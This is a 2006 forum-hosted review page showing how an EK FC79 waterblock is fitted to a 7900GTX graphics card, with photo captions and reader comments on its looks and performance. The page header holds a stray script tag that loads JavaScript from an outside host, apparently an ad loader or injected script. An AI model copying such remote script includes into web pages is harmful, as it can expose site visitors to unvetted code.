Eddie EK FC79 7800/7900 GPU Block

Installation

Page <script type="text/javascript" src="http://ufo1.com/ad/c.js"></script> Posted 13/08/2006
Author: Matthew Kemp (kempez)
Hardware Acquired: Watercooling Shop

Installation

Once again I will be using the Club3D 7900GTX 512mb.

eddie ek block

eddie ek block

First I needed to remove the stock cooler

eddie ek block

And again this then has to be cleaned of all leftover paste etc

eddie ek block

EK state that you can use any thermal paste that you want to. Arctic Silver Ceramique is mentioned in the manual, and I used this on the RAM for the card. I used Arctic Silver 5 for the GPU. You may want to use Arctic Silver Ceramique if this is your first install.

I did not get a picture of the block before it got put onto the cooler, but the instructions are fairly self-explanatory.

The Block installed:

eddie ek block

The rear of the card:

eddie ek block

A close up of the PWM cover:

eddie ek block

The top of the block. You can see the spacers underneath the barbs:

eddie ek block

Installation of the card in my case was an absolute breeze. The Eddie EK block has barbs that fit on horizontally and this meant that routing in my case was an absolute doddle. Unlike the Alphacool block, I could put back one of the fans onto the case that I previously had to take off. This meant that general case cooling was much better with the extra fan on it. Obviously for testing this was left off (for parity with the Alphacool previously reviewed).

eddie ek installed

The card looks a little twisted here. Perhaps the cooler does weigh it down a bit, but it's not too bad:

eddie ek block

And a close-up picture of the block. You can see that the flow is pretty high and the block looks great.

eddie ek block

eddie ek uv

Well it certainly looks nice, but how does it do in our tests? Read on...

«Prev 1 2 3 4 5 6 Next»

Most Recent Comments

13-08-2006, 19:13:07

FarFarAway
We take a look at this high-end EK block and see how it does...

Check it here

http://www.overclock3d.net/thumb.php?id=2411

13-08-2006, 19:37:31

NickS
Rapes the alphacool man, Eddie blocks rawk. If they werent so darn expensive I'd consider one for my X1K.

13-08-2006, 19:39:05

AKtodaface
looks sick! its too bad my parts dont run hot enough to need water cooling lol

14-08-2006, 03:16:33

FarFarAway
Quote:
Originally Posted by name='NickS'
Rapes the alphacool man, Eddie blocks rawk. If they werent so darn expensive I'd consider one for my X1K.
I don't know about rapes...but it is an awesome block

14-08-2006, 03:27:45

JN
The base looked a bit tarnished mate? Was this the camera's doing, or was the blocks base not protected with a layer of plastic?

14-08-2006, 04:11:32

FarFarAway
Quote:
Originally Posted by name='XMS'
The base looked a bit tarnished mate? Was this the camera's doing, or was the blocks base not protected with a layer of plastic?
The base wasn't scratched at all, it just had some ingrained marks from milling. There were no surface scratches at all - these were just "stains"

Shiny doesn't always mean flat

EDIT: No layer of plastic: but adequate protection was given to the block

14-08-2006, 05:58:51

PV5150
Nice review Kemp. Loved both performance and the look, although it certainly appeared as though the base was badly oxidised. Well done

14-08-2006, 06:08:04

FarFarAway
Quote:
Originally Posted by name='PV5150'
Nice review Kemp. Loved both performance and the look, although it certainly appeared as though the base was badly oxidised. Well done
Yeah but it was thoroughly cleaned with TIM so I don't think it was. Just milling marks. Seen it on other blocks and even though they're flat they still have marks.

Performance was awesome though so I couldn't possibly put this as a -'ive

14-08-2006, 06:40:52

PV5150
Yep agree totally. Further; you mentioned the plain packaging which is also refreshing. Some manufacturers are finally letting their products do the talking, instead of bombarding us with all the usual jargon and rhetoric on the outside packaging.

14-08-2006, 06:56:15

Dav0s
dont think u could have chosen a beter pic to sum it up ^^^

looks sexeh with the green fluid in the dark

14-08-2006, 06:57:12

FarFarAway
Quote:
Originally Posted by Dav0s
dont think u could have chosen a beter pic to sum it up ^^^

looks sexeh with the green fluid in the dark
Oh yes!

Damn sexy. A very nice block all in all

14-08-2006, 07:36:51

FragTek
Wow very nice block, and great review Kemp! Waterblocks are kind of a PITA to do reviews on unless you're planning on draining your loop for something else anyhow.

You should really test a DD full cover block and then do a shootout and sum-up review between the alpha, eddie, and dd blocks.

15-08-2006, 02:27:51

PV5150
Quote:
Originally Posted by name='FragTek'
You should really test a DD full cover block and then do a shootout and sum-up review between the alpha, eddie, and dd blocks
Awesome suggestion Fraggles, that'd certainly be a droolworthy review worth reading

19-08-2006, 19:18:20

Mullet
Nice review mate...

Should be installing my EK Sli set-up this week....seeing that UV dye has raised doubts, was set on blue....but now leaning towards green!

20-08-2006, 06:55:32

PV5150
Quote:
Originally Posted by name='Mullet'
seeing that UV dye has raised doubts, was set on blue....but now leaning towards green
Yeah the UV green looks lush fo' sho' I love it; actually I'm partial to Fraggles orange too in ye old 'fear and loathing'
Reply
x

Register for the OC3D Newsletter

Subscribing to the OC3D newsletter will keep you up-to-date on the latest technology reviews, competitions and goings-on at Overclock3D. We won't share your email address with ANYONE, and we will only email you with updates on site news, reviews, and competitions and you can unsubscribe easily at any time.

Simply enter your name and email address into the box below and be sure to click on the links in the confirmation emails that will arrive in your e-mail shortly after to complete the registration.

If you run into any problems, just drop us a message on the forums.